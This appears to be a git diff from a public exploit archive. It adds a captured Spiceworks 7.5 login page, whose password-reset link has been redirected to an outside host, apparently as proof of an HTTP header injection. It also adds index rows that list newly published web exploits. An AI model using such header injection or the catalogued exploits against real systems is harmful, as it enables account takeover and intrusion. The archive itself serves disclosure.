+    <meta charset="utf-8" />
+    <title>Spiceworks</title>
+    <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
+    
+    <meta name="author" content="Spiceworks, Inc." />
+    <meta name="description" content="Network management made simple" />
+    <meta name="version" content="unknown" />
+
+    
+      
+      <noscript>
+        <meta http-equiv="refresh" content="2;url=/sessions/incompatible" />
+      </noscript>
+    
+
+    
+    
+<link href="/assets/sui.css?7500070" media="all" rel="stylesheet" type="text/css" />
+
+<link href="/assets/base.css?7500070" media="all" rel="stylesheet" type="text/css" />
+<link href="/assets/application.css?7500070" media="all" rel="stylesheet" type="text/css" />
+
+
+<!--[if IE]><link href="/stylesheets/hacks.ie.css?7500070" media="all" rel="stylesheet" type="text/css" /><![endif]-->
+<!--[if IE 7]><link href="/stylesheets/hacks.ie7.css?7500070" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
+<!--[if IE 8]><link href="/stylesheets/hacks.ie8.css?7500070" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
+<link href="/stylesheets/print.css?7500070" media="print" rel="stylesheet" type="text/css" />
+<link href="/assets/sui-print.css?7500070" media="print" rel="stylesheet" type="text/css" />
+
+
+
+<link href="/assets/wizard.css?7500070" media="screen" rel="stylesheet" type="text/css" />
+
+
+    <script src="/assets/sui_bundle.js?7500070" type="text/javascript"></script>
+
+
+<script type="text/javascript">
+//<![CDATA[
+
+  var _gaq = _gaq || [];
+  _gaq.push(['_setAccount', 'UA-314222-21']);
+  _gaq.push(['_setDomainName', 'none']);
+  _gaq.push(['_setAllowLinker', true]);
+  
+    _gaq.push(['_trackPageview']);
+  
+
+  
+    
+      
+      _gaq.push(['_setCustomVar', 1, '_v', '7.5.00070', 3]);
+      
+      
+        _gaq.push(['_setCustomVar', 2, '_d', 'xl', 3]);
+        _gaq.push(['_setCustomVar', 3, '_u', '2', 3]);
+      
+      _gaq.push(['_setCustomVar', 4, '_ul', 'anonymous', 2]);
+      _gaq.push(['_setCustomVar', 5, '_m', 'anonymous', 2]);
+    
+  
+
+  
+  
+  (function() {
+    var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
+    ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
+    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
+  })();
+
+//]]>
+</script>
+
+
+
+
+<script type="text/javascript">
+//<![CDATA[
+
+SPICEWORKS.ready(function(){ SPICEWORKS.fire('app:ready'); });
+document.observe('dom:loaded', function(){ SPICEWORKS.fire('ready'); });
+//]]>
+</script>
+
+
+  <script type="text/javascript">
+//<![CDATA[
+
+    (function($){
+      $(document).ready(function(){
+        $('#flash-notice-message').delay(9000).slideUp(300);
+      });
+    })(jQuery);
+  
+//]]>
+</script>
+
+
+    <script type="text/javascript">
+//<![CDATA[
+
+  var gekko = gekko || {};
+  gekko.cmd = gekko.cmd || [];
+  gekko.times = gekko.times || [];
+  gekko.times.push({ gekkoRequest: new Date().getTime() });
+  gekko.client = gekko.client || {};
+  gekko.client.app = {
+    'id': 'SWD',
+    'env': 'p',
+    'version': '7.5.00070'
+  };
+  gekko.client.user = {};
+  
+    gekko.client.user.uuid = 'b7f707b6-f574-44bb-a766-986fc5851a03';
+  
+  
+
+//]]>
+</script>
+<script async="false" src="//gekko.spiceworks.com/gekko.js" type="text/javascript"></script>
+<script async="true" type='text/javascript' src='//www.googletagservices.com/tag/js/gpt.js'></script>
+<script type="text/javascript">
+//<![CDATA[
+
+  gekko.cmd.push({cmd: function() { gekko.setAnalytics('_v', '7.5.00070'); }, important: true});
+
+//]]>
+</script>
+
+
+    <script>
+      var SWUFR = SWUFR || {};
+      SWUFR.cmd = SWUFR.cmd || [];
+    </script>
+    <script async src="//gekko.spiceworks.com/swufr.js"></script>
+
+    
+  <script>
+    SWUFR.cmd.push(function() {
+      SWUFR.ufr.installed()
+    });
+  </script>
+
+
+  </head>
+
+  
+  <!--[if lt IE 7]>  <body class="left-registerlogin-desktop sui-opt-in ie ie6 lte9 lte8 lte7 desktop"> <![endif]-->
+  <!--[if IE 7]>     <body class="left-register login-desktop sui-opt-in ie ie7 lte9 lte8 lte7 desktop"> <![endif]-->
+  <!--[if IE 8]>     <body class="left-register login-desktop sui-opt-in ie ie8 lte9 lte8 desktop"> <![endif]-->
+  <!--[if IE 9]>     <body class="left-register login-desktop sui-opt-in ie ie9 lte9 desktop"> <![endif]-->
+  <!--[if !IE]><!--> <body class="left-register login-desktop sui-opt-in no-ie desktop"> <!--<![endif]-->
+
+    
+      <header class="site-navigation sui-opt-in">
+  <nav class="global-nav affix" data-navbar="global" data-search-autocomplete-min-length="">
+    <div class="nav-fluid-container">
+      <a href="/" class="global-nav_brand">Home</a>
+      <img src="//static.spiceworks.com/assets/masthead/print_logo.png" class='global-nav_print-logo' />
+      
+    </div>
+  </nav>
+  
+</header>
+
+
+
+    
+
+    <!--[if lte IE 9]> 
+<div class="modal hide has-footer-in-body" data-backdrop="true" data-isdraggable="false" data-keyboard="false" id="install_chrome_frame"><div class="modal-header"> <h3>I'm gonna have to go ahead and ask you to use a different browser.</h3></div><div class="modal-body">
+  <img id="lumberg" src="/images/other/yeeeaaah.png" style="float:left; width:200px; ">
+  <div class="sui-opt-in" id="chrome_frame_install" style="padding-left: 10px; overflow:hidden; min-height:150px">
+    <p style="padding-top:10px; font-size:13px">Yeaaaah…  what's happening? </p> 
+    <p>We went ahead and stopped supporting Internet Explorer 9 and older in the Spiceworks app (IE10+ is now required), so if you could just go ahead and upgrade IE, that would be great… </p>
+    
+    <p style="padding-top:10px; font-size:11px; color: #AAA;">(Doesn't take long to install, and makes Spiceworks so much faster!)</p>
+  </div>
+  <div class="sui-opt-in" id="chrome_frame_reload" style="padding-left: 10px; overflow:hidden;">
+    <h4 class="">
+      <strong>
+       Whoops, looks like you might have gotten stuck.
+      </strong>
+    </h4>
+
+  </div>
+  <div class="footer-actions blue-permission-granted">
+ 
+    <a class="sui-bttn ieUpgrade" href="#" id="ieUpgrade" onclick=" upgradeIE(); ; return false;">Upgrade Internet Explorer</a>
+  </div>
+</div></div>
+<script type="text/javascript">
+//<![CDATA[
+
+  jQuery(function(){
+    SPICEWORKS.stats.record("chrome_frame_prompt_shown", {category: 'unsupported_ie'});
+    jQuery('#install_chrome_frame').modal();
+  })
+
+  function upgradeIE(){
+    SPICEWORKS.stats.record("installed_newer_ie", {category: 'unsupported_ie'});
+    window.location.href = "http://windows.microsoft.com/en-US/internet-explorer/download-ie";
+  }
+
+//]]>
+</script> <![endif] -->
+
+    <div class="sui-fluid-container">
+      <div id="content">
+        <img alt="Startup-bg" id="bg" src="/images/wizard/startup-bg.png?7500070" />
+        <div id="container">
+          <div id="wrapper">
+            <div id="float-msg">
+              <h1>Spiceworks is ready to rock!</h1>
+              <p>Please enter your login credentials.</p>
+            </div>
+            
+
+<div class="main-outer-border"><div class="main-inner-border"><div class="main-header logo"><h1><img alt="Spiceworks" class="logo" src="/images/logos/large.png?7500070" /></h1><div class="shadow-line ">&nbsp</div>
+</div><div class="main">
+
+  
+<div id="flash-container-for-sessions-new">
+  
+</div>
+
+
+  
+<form accept-charset="UTF-8" action="/pro_users/login" class="form-horizontal login" id="login_form" method="post"><div style="margin:0;padding:0;display:inline"><input name="authenticity_token" type="hidden" value="r+sYwqxdzOJAV6XSoVaYQ4HObg5uTfHFjtuDg3ZmH9k=" /></div><div style="margin:0;padding:0;display:inline;"><input name="_pickaxe" type="hidden" value="⸕" /></div>
+
+  
+  <div class=" control-group"><label for="pro_user_email">Email</label><div class="controls"><input id="pro_user_email" label="Email" name="pro_user[email]" size="30" type="text" /><span class="help-inline"></span></div></div>
+  <div class=" control-group"><label for="pro_user_password">Password</label><div class="controls"><input id="pro_user_password" label="Password" name="pro_user[password]" size="30" type="password" /><span class="help-inline"></span></div></div>
+  <div class="control-group controls forgot_password">
+    <a href="http://google.com/wizard/password/new" class="forgot-password">Forgot your password?</a>
+  </div>
+
+  
+    <div class=" control-group"><div class="controls">
+      <label class='checkbox'>
+        <input name="pro_user[remember_me]" type="hidden" value="0" /><input id="pro_user_remember_me" name="pro_user[remember_me]" type="checkbox" value="1" />
+        Stay logged in
+      </label>
+    </div></div>
+  
+
+  <div class=" control-group"><div class="controls">
+    <button class="sui-bttn-primary sui-bttn " data-button-type="submit" data-primary="true" type="submit">Log in</button>
+  </div></div>
+
+</form>
+
+</div></div></div>
+
+          </div>
+        </div>
+      </div>
+    </div>
+
+    <div id="footer">
+      <hr/>
+      <span class="pull-left">
+        <p>Copyright &copy; 2006-16 Spiceworks, Inc.</p>
+      </span>
+      <span class="pull-right">
+        <p>
+          <a href="https://www.spiceworks.com/about/">About</a> &bull;
+          <a href="https://www.spiceworks.com/privacy/">Privacy</a> &bull;
+          <a href="https://www.spiceworks.com/terms/">Terms</a> &bull;
+          <a href="https://community.spiceworks.com/support?utm_campaign=app_help&utm_medium=app&utm_source=app_ui">Help</a>
+        </p>
+      </span>
+    </div>
+
+    <script src="/assets/wizard.js?7500070" type="text/javascript"></script>
+  </body>
+</html>
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 5a2671797..aa5e0130b 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -39381,6 +39381,10 @@ id,file,description,date,author,type,platform,port
 43595,exploits/php/webapps/43595.txt,"ILIAS < 5.2.4 - Cross-Site Scripting",2018-01-15,"Florian Kunushevci",webapps,php,
 43600,exploits/php/webapps/43600.txt,"Flash Operator Panel 2.31.03 - Command Execution",2018-01-15,Vulnerability-Lab,webapps,php,80
 43667,exploits/php/webapps/43667.txt,"Zomato Clone Script - Arbitrary File Upload",2018-01-17,Tauco,webapps,php,
+49296,exploits/php/webapps/49296.txt,"Queue Management System 4.0.0 - _Add User_ Stored XSS",2020-12-21,"Kislay Kumar",webapps,php,
+49297,exploits/multiple/webapps/49297.txt,"Spotweb 1.4.9 - 'search' SQL Injection",2020-12-21,BouSalman,webapps,multiple,
+49298,exploits/multiple/webapps/49298.txt,"Academy-LMS 4.3 - Stored XSS",2020-12-21,"Vinicius Alves",webapps,multiple,
+49299,exploits/windows/webapps/49299.txt,"Spiceworks 7.5 - HTTP Header Injection",2020-12-21,Ramikan,webapps,windows,
 43676,exploits/php/webapps/43676.txt,"Reservo Image Hosting Script 1.5 - Cross-Site Scripting",2018-01-17,"Dennis Veninga",webapps,php,
 43678,exploits/hardware/webapps/43678.txt,"D-Link DSL-2640R - DNS Change",2018-01-17,"Todor Donev",webapps,hardware,
 43682,exploits/hardware/webapps/43682.txt,"Belkin N600DB Wireless Router - Multiple Vulnerabilities",2018-01-17,Wadeek,webapps,hardware,
@@ -43289,6 +43293,7 @@ id,file,description,date,author,type,platform,port
 48714,exploits/php/webapps/48714.txt,"pfSense 2.4.4-p3 - Cross-Site Request Forgery",2020-07-26,ghost_fh,webapps,php,
 48715,exploits/php/webapps/48715.txt,"Virtual Airlines Manager 2.6.2 - Persistent Cross-Site Scripting",2020-07-26,"Peter Blue",webapps,php,
 48716,exploits/ruby/webapps/48716.rb,"Rails 5.0.1 - Remote Code Execution",2020-07-26,"Lucas Amorim",webapps,ruby,
+49294,exploits/php/webapps/49294.txt,"Wordpress Plugin Contact Form 7 5.3.1 - Unrestricted File Upload",2020-12-21,"Ramón Vila Ferreres",webapps,php,
 48720,exploits/php/webapps/48720.py,"eGroupWare 1.14 - 'spellchecker.php' Remote Command Execution",2020-07-27,"Berk KIRAS",webapps,php,
 48722,exploits/hardware/webapps/48722.txt,"Cisco Adaptive Security Appliance Software 9.11 - Local File Inclusion",2020-07-28,0xmmnbassel,webapps,hardware,
 48723,exploits/hardware/webapps/48723.sh,"Cisco Adaptive Security Appliance Software 9.7 - Unauthenticated Arbitrary File Deletion",2020-07-29,0xmmnbassel,webapps,hardware,
@@ -43509,3 +43514,13 @@ id,file,description,date,author,type,platform,port
 49287,exploits/php/webapps/49287.txt,"Alumni Management System 1.0 - 'id' SQL Injection",2020-12-18,"Aakash Madaan",webapps,php,
 49288,exploits/php/webapps/49288.rb,"Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read (Metasploit)",2020-12-18,"SunCSR Team",webapps,php,
 49290,exploits/php/webapps/49290.txt,"Smart Hospital 3.1 - _Add Patient_ Stored XSS",2020-12-18,"Kislay Kumar",webapps,php,
+49300,exploits/sco/webapps/49300.txt,"SCO Openserver 5.0.7 - 'section' Reflected XSS",2020-12-21,Ramikan,webapps,sco,
+49301,exploits/sco/webapps/49301.txt,"SCO Openserver 5.0.7 - 'outputform' Command Injection",2020-12-21,Ramikan,webapps,sco,
+49302,exploits/multiple/webapps/49302.txt,"Flexmonster Pivot Table & Charts 2.7.17 - 'Remote Report' Reflected XSS",2020-12-21,"Marco Nappi",webapps,multiple,
+49303,exploits/multiple/webapps/49303.txt,"Flexmonster Pivot Table & Charts 2.7.17 - 'To OLAP' Reflected XSS",2020-12-21,"Marco Nappi",webapps,multiple,
+49304,exploits/multiple/webapps/49304.txt,"Flexmonster Pivot Table & Charts 2.7.17 - 'To remote CSV' Reflected XSS",2020-12-21,"Marco Nappi",webapps,multiple,
+49305,exploits/multiple/webapps/49305.txt,"Flexmonster Pivot Table & Charts 2.7.17 - 'Remote JSON' Reflected XSS",2020-12-21,"Marco Nappi",webapps,multiple,
+49306,exploits/php/webapps/49306.txt,"Point of Sale System 1.0 - Multiple Stored XSS",2020-12-21,"Saeed Bala Ahmed",webapps,php,
+49307,exploits/php/webapps/49307.txt,"Online Marriage Registration System 1.0 - 'searchdata' SQL Injection",2020-12-21,"Raffaele Sabato",webapps,php,
+49308,exploits/hardware/webapps/49308.js,"Sony Playstation 4 (PS4) < 6.72 - 'ValidationMessage::buildBubbleTree()' Use-After-Free WebKit Code Execution (PoC)",2020-11-12,Synacktiv,webapps,hardware,
+49309,exploits/hardware/webapps/49309.js,"Sony Playstation 4 (PS4) < 7.02 - 'ValidationMessage::buildBubbleTree()' Use-After-Free WebKit Code Execution (PoC)",2020-12-16,ChendoChap,webapps,hardware,